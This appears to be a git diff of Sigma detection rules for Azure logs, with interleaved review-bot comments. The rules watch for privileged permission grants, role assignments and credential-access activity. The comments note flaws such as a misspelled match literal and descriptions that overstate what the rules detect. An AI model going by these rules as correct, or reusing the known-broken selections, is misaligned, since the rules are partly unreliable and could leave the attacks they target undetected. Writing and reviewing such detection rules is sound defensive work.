+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/10
+tags:
+ - attack.credential_access
+ - attack.t1528
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message:
+ - Add delegated permission grant
+ - Add app role assignment to service principal
+ condition: selection
+falsepositives:
+ - When the permission is legitimately needed for the app
+level: high
diff --git a/src/main/resources/rules/azure/azure_app_privileged_permissions.yml b/src/main/resources/rules/azure/azure_app_privileged_permissions.yml
new file mode 100644
index 000000000..18ad0b8b3
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_privileged_permissions.yml
@@ -0,0 +1,26 @@
+title: App Granted Privileged Delegated Or App Permissions
+id: 5aecf3d5-f8a0-48e7-99be-3a759df7358f
+related:
+ - id: ba2a7c80-027b-460f-92e2-57d113897dbc
+ type: obsoletes
+status: test
+description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/28
+modified: 2023/03/29
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1098.003
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message: Add app role assignment to service principal
+ condition: selection
+falsepositives:
+ - When the permission is legitimately needed for the app
+level: high
diff --git a/src/main/resources/rules/azure/azure_app_role_added.yml b/src/main/resources/rules/azure/azure_app_role_added.yml
new file mode 100644
index 000000000..322583a2d
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_role_added.yml
@@ -0,0 +1,25 @@
+title: App Role Added
+id: b04934b2-0a68-4845-8a19-bdfed3a68a7a
+status: test
+description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/19
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1098.003
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message:
+ - Add member to role
+ - Add eligible member to role
+ - Add scoped member to role
+ condition: selection
+falsepositives:
+ - When the permission is legitimately needed for the app
+level: medium
diff --git a/src/main/resources/rules/azure/azure_app_ropc_authentication.yml b/src/main/resources/rules/azure/azure_app_ropc_authentication.yml
index 82222f0ca..ea7a08a26 100644
--- a/src/main/resources/rules/azure/azure_app_ropc_authentication.yml
+++ b/src/main/resources/rules/azure/azure_app_ropc_authentication.yml
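Review bot: The selection matches `Add member to role` / `Add eligible member to role` / `Add scoped member to role` for any principal, not only applications, so despite the title "App Role Added" it fires on every user added to a directory role and fully overlaps azure_ad_users_added_to_device_admin_roles.yml. If target-type information is available (that sibling already keys on `TargetResources|contains`), add a constraint on the target being a service principal; otherwise retitle and re-describe the rule as covering all role member additions. `level: medium` is also low for what the description says may be a Global Administrator assignment, compared with the sibling rules at `high`.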
@@ -1,24 +1,26 @@
 title: Applications That Are Using ROPC Authentication Flow
 id: 55695bc0-c8cf-461f-a379-2535f563c854
-description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
+status: test
+description: |
+ Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.
+ The application then uses those credentials to authenticate the user against the identity provider.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/06/01
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows
+tags:
+ - attack.t1078
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.initial_access
 logsource:
- product: azure
- service: signinlogs
+ product: azure
+ service: signinlogs
 detection:
- selection:
- properties.message: ROPC
- condition: selection
+ selection:
+ properties.message: ROPC
+ condition: selection
 falsepositives:
- - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow
+ - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow
 level: medium
-status: experimental
-tags:
- - attack.t1078
- - attack.defense_evasion
- - attack.persistence
- - attack.privilege_escalation
- - attack.initial_access
diff --git a/src/main/resources/rules/azure/azure_app_uri_modifications.yml b/src/main/resources/rules/azure/azure_app_uri_modifications.yml
index a2cda3522..cdae8aa64 100644
--- a/src/main/resources/rules/azure/azure_app_uri_modifications.yml
+++ b/src/main/resources/rules/azure/azure_app_uri_modifications.yml
@@ -1,24 +1,26 @@
 title: Application URI Configuration Changes
 id: 0055ad1f-be85-4798-83cf-a6da17c993b3
-description: Detects when a configuration change is made to an applications URI.
- URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app,
- or URIs that point to domains you do not control should be investigated.
+status: test
+description: |
+ Detects when a configuration change is made to an applications URI.
+ URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/06/02
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes
+tags:
+ - attack.t1528
+ - attack.t1078.004
+ - attack.persistence
+ - attack.credential_access
+ - attack.privilege_escalation
 logsource:
- product: azure
- service: auditlogs
+ product: azure
+ service: auditlogs
 detection:
- selection:
- properties.message: Update Application Sucess- Property Name AppAddress
- condition: selection
+ selection:
+ properties.message: Update Application Sucess- Property Name AppAddress
+ condition: selection
 falsepositives:
- - When and administrator is making legitmate URI configuration changes to an application. This should be a planned event.
+ - When and administrator is making legitimate URI configuration changes to an application. This should be a planned event.
 level: high
-status: experimental
-tags:
- - attack.t1528
- - attack.persistence
- - attack.credential_access
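Review bot: The match literal `Update Application Sucess- Property Name AppAddress` contains a misspelling (`Sucess`); unless the audit log text genuinely reads that way, this selection never matches and the rule is silently dead, and the commit re-indents the line while keeping the literal. Verify the exact event text and either correct it to `Success` or mark it deliberately with `# literal intentionally mirrors the log text, including 'Sucess'` above the line. The rewritten false-positive entry also still reads `When and administrator`; `When an administrator` is intended. The description's `URIs that are no unique to that app` should read `not unique`.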
diff --git a/src/main/resources/rules/azure/azure_application_deleted.yml b/src/main/resources/rules/azure/azure_application_deleted.yml
index a2e52ca9d..7ac5228ee 100644
--- a/src/main/resources/rules/azure/azure_application_deleted.yml
+++ b/src/main/resources/rules/azure/azure_application_deleted.yml
@@ -1,24 +1,27 @@
 title: Azure Application Deleted
 id: 410d2a41-1e6d-452f-85e5-abdd8257a823
+status: test
 description: Identifies when a application is deleted in Azure.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/09/03
 references:
 - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy
+author: Austin Songer @austinsonger
+date: 2021/09/03
+modified: 2022/10/09
+tags:
+ - attack.defense_evasion
+ - attack.impact
+ - attack.t1489
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
 properties.message:
 - Delete application
 - Hard Delete application
 condition: selection
-level: medium
-tags:
- - attack.defense_evasion
 falsepositives:
- - Application being deleted may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Application being deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml
index d242e0caa..f0ad353c4 100644
--- a/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml
+++ b/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml
@@ -1,24 +1,25 @@
 title: Azure Application Gateway Modified or Deleted
 id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6
+status: test
 description: Identifies when a application gateway is modified or deleted.
-author: Austin Songer
-status: experimental
-date: 2021/08/16
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+author: Austin Songer
+date: 2021/08/16
+modified: 2022/08/23
+tags:
+ - attack.impact
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
- properties.message:
+ operationName:
 - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE
 - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE
 condition: selection
-level: medium
-tags:
- - attack.impact
 falsepositives:
- - Application gateway being modified or deleted may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Application gateway being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml
index abd3d183e..0f7d34bc0 100644
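Review bot: The new key `operationName` (lower camel case) matches the raw Activity Log JSON export but, as far as I know, not the Log Analytics `AzureActivity` table, where the column is `OperationNameValue`, so which spelling resolves depends on the ingestion path; the same change is made in azure_application_security_group_modified_or_deleted.yml in the next hunk. A comment on the changed line, `# operationName as in the Activity Log export; AzureActivity exposes it as OperationNameValue`, would spare the next reader the lookup. The `/WRITE` literal also fires on every routine PUT to the resource (tag or listener updates), which the false-positive list could name explicitly rather than leaving it under "modified ... by a system administrator".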
--- a/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml @@ -1,24 +1,25 @@ title: Azure Application Security Group Modified or Deleted id: 835747f1-9329-40b5-9cc3-97d465754ce6 +status: test description: Identifies when a application security group is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Application security group being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_blocked_account_attempt.yml b/src/main/resources/rules/azure/azure_blocked_account_attempt.yml index cf0984b80..abdeae62c 100644 
--- a/src/main/resources/rules/azure/azure_blocked_account_attempt.yml +++ b/src/main/resources/rules/azure/azure_blocked_account_attempt.yml @@ -1,10 +1,14 @@ title: Account Disabled or Blocked for Sign in Attempts id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd +status: test description: Detects when an account is disabled or blocked for sign in but tried to log in -author: Yochana Henderson, '@Yochana-H' -date: 2022/06/17 references: - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +tags: + - attack.initial_access + - attack.t1078.004 logsource: product: azure service: signinlogs @@ -13,11 +17,7 @@ detection: ResultType: 50057 ResultDescription: Failure condition: selection -level: medium falsepositives: - Account disabled or blocked in error - Automation account has been blocked or disabled -status: experimental -tags: - - attack.credential_access - - attack.t1110 +level: medium diff --git a/src/main/resources/rules/azure/azure_change_to_authentication_method.yml b/src/main/resources/rules/azure/azure_change_to_authentication_method.yml index b251b5c25..046bc2956 100644 --- a/src/main/resources/rules/azure/azure_change_to_authentication_method.yml +++ b/src/main/resources/rules/azure/azure_change_to_authentication_method.yml 
@@ -1,22 +1,27 @@ title: Change to Authentication Method id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 -status: experimental +status: test +description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts author: AlertIQ date: 2021/10/10 -description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.t1556 + - attack.persistence + - attack.defense_evasion + - attack.t1098 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - LoggedByService: 'Authentication Methods' - Category: 'UserManagement' - OperationName: 'User registered security info' - condition: selection -level: medium + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_conditional_access_failure.yml b/src/main/resources/rules/azure/azure_conditional_access_failure.yml index d0af28e9b..7836b8f1c 100644 --- a/src/main/resources/rules/azure/azure_conditional_access_failure.yml +++ b/src/main/resources/rules/azure/azure_conditional_access_failure.yml 
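Review bot: `falsepositives: - Unknown` understates the noise of this selection: `OperationName: 'User registered security info'` is, as far as I can tell, also written for every legitimate self-service MFA or SSPR registration, so new-hire onboarding and device replacement will trigger it at medium. I would replace the entry with `- Legitimate self-service security info registration, e.g. during onboarding or after a device replacement` and note in the description that the event is most meaningful when correlated with a recent risky sign-in or password reset for the same user.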
@@ -1,10 +1,16 @@ title: Sign-in Failure Due to Conditional Access Requirements Not Met id: b4a6d707-9430-4f5f-af68-0337f52d5c42 +status: test description: Define a baseline threshold for failed sign-ins due to Conditional Access failures -author: Yochana Henderson, '@Yochana-H' -date: 2022/06/01 references: - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/01 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1110 + - attack.t1078.004 logsource: product: azure service: signinlogs @@ -18,7 +24,3 @@ falsepositives: - Misconfigured Systems - Vulnerability Scanners level: high -status: experimental -tags: - - attack.credential_access - - attack.t1110 diff --git a/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml b/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml index e47111824..f9c8753ec 100644 --- a/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml 
@@ -1,27 +1,28 @@ title: Azure Container Registry Created or Deleted id: 93e0ef48-37c8-49ed-a02c-038aab23628e +status: test description: Detects when a Container Registry is created or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE condition: selection -level: low -tags: - - attack.impact falsepositives: - - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low 
diff --git a/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml b/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml index 04c3ed96e..e7363dca4 100644 --- a/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml +++ b/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml @@ -2,21 +2,22 @@ title: Number Of Resource Creation Or Deployment Activities id: d2d901db-7a75-45a1-bc39-0cbf00812192 status: test description: Number of VM creations or deployment activities occur in Azure via the azureactivity log. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Creating_Anomalous_Number_Of_Resources_detection.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.Compute/virtualMachines/write - - Microsoft.Resources/deployments/write - condition: keywords + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1098 diff --git a/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml b/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml index 5fc10bc63..dd2365036 100644 --- a/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml 
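Review bot: The description promises a count-based detection ("Number of VM creations or deployment activities") and cites Sentinel's anomaly query, but the `keywords` selection fires on every single `Microsoft.Compute/virtualMachines/write` or `Microsoft.Resources/deployments/write` event, since the detection block carries no threshold or baseline. The same gap exists in the granting-permission hunk below, whose description claims to alert on a "previously unseen source IP address" while matching every `Microsoft.Authorization/roleAssignments/write`. I would make this explicit, e.g. `description: Matches VM creation or deployment activities in Azure activity logs; the anomalous-count logic of the referenced Sentinel query must be applied by the consuming backend.`, so a deployer does not mistake the rule for the anomaly detection it cites. With `falsepositives: - Valid change` alone, the rule is better treated as input to an aggregation than as a standalone medium alert.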
@@ -1,22 +1,23 @@ title: Azure Device No Longer Managed or Compliant id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +status: test description: Identifies when a device in azure is no longer managed or compliant -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: - Device no longer compliant - Device no longer managed condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Administrator may have forgotten to review the device. + - Administrator may have forgotten to review the device. +level: medium diff --git a/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml index 9f18c1e9f..b05239e65 100644 --- a/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml 
@@ -1,14 +1,19 @@ title: Azure Device or Configuration Modified or Deleted id: 46530378-f9db-4af9-a9e5-889c177d3881 +status: test description: Identifies when a device or device configuration in azure is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 + - attack.t1565.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: @@ -17,10 +22,8 @@ detection: - Update device - Update device configuration condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Device or device configuration being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Device or device configuration being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml index faa86c01e..5cf9825bb 100644 --- a/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml 
+++ b/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml @@ -1,24 +1,26 @@ title: Azure DNS Zone Modified or Deleted id: af6925b0-8826-47f1-9324-337507a0babd +status: test description: Identifies when DNS zone is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.t1565.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message|startswith: MICROSOFT.NETWORK/DNSZONES - properties.message|endswith: - - /WRITE - - /DELETE + operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES' + operationName|endswith: + - '/WRITE' + - '/DELETE' condition: selection -level: medium -tags: - - attack.impact falsepositives: - - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_federation_modified.yml b/src/main/resources/rules/azure/azure_federation_modified.yml index 4512ee967..8ff1cf259 100644 --- a/src/main/resources/rules/azure/azure_federation_modified.yml +++ b/src/main/resources/rules/azure/azure_federation_modified.yml 
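Review bot: `operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES'` combined with `|endswith` of `/WRITE` or `/DELETE` matches every operation path under the zone, so record-set changes (operation names of the shape `MICROSOFT.NETWORK/DNSZONES/<record-type>/WRITE`, if the Activity Log uses that form) will alert alongside zone-level changes, and zone creation matches as well. That breadth is arguably what you want for DNS hijacking detection, but the description "Identifies when DNS zone is modified or deleted" does not say so. I would document it: `description: Identifies when a DNS zone, or any record set within it, is created, modified, or deleted.`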
@@ -1,25 +1,25 @@ title: Azure Domain Federation Settings Modified id: 352a54e1-74ba-4929-9d47-8193d67aba1e +status: test description: Identifies when an user or application modified the federation settings on the domain. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes author: Austin Songer -status: experimental date: 2021/09/06 modified: 2022/06/08 -references: - - https://attack.mitre.org/techniques/T1078 - - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: selection: ActivityDisplayName: Set federation settings on domain condition: selection -level: medium -tags: - - attack.initial_access - - attack.t1078 falsepositives: - - Federation Settings being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Federation Settings being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +level: medium diff --git a/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml index 28c659a05..6a9d98390 100644 --- a/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml 
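Review bot: The hunk adds an empty `+` line between the falsepositives list and `+level: medium`, which no other rule touched by this commit has; the blank line should be dropped so the file matches the layout of its siblings. The selection itself is unchanged by the reorder.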
@@ -1,23 +1,26 @@ title: Azure Firewall Modified or Deleted id: 512cf937-ea9b-4332-939c-4c2c94baadcd +status: test description: Identifies when a firewall is created, modified, or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml index de1fc0c5d..d8aed4657 100644 --- a/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml 
@@ -1,17 +1,22 @@ title: Azure Firewall Rule Collection Modified or Deleted id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 +status: test description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE 
@@ -19,9 +24,7 @@ detection: - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_granting_permission_detection.yml b/src/main/resources/rules/azure/azure_granting_permission_detection.yml index d1fb9dfd4..58cb33d52 100644 --- a/src/main/resources/rules/azure/azure_granting_permission_detection.yml +++ b/src/main/resources/rules/azure/azure_granting_permission_detection.yml 
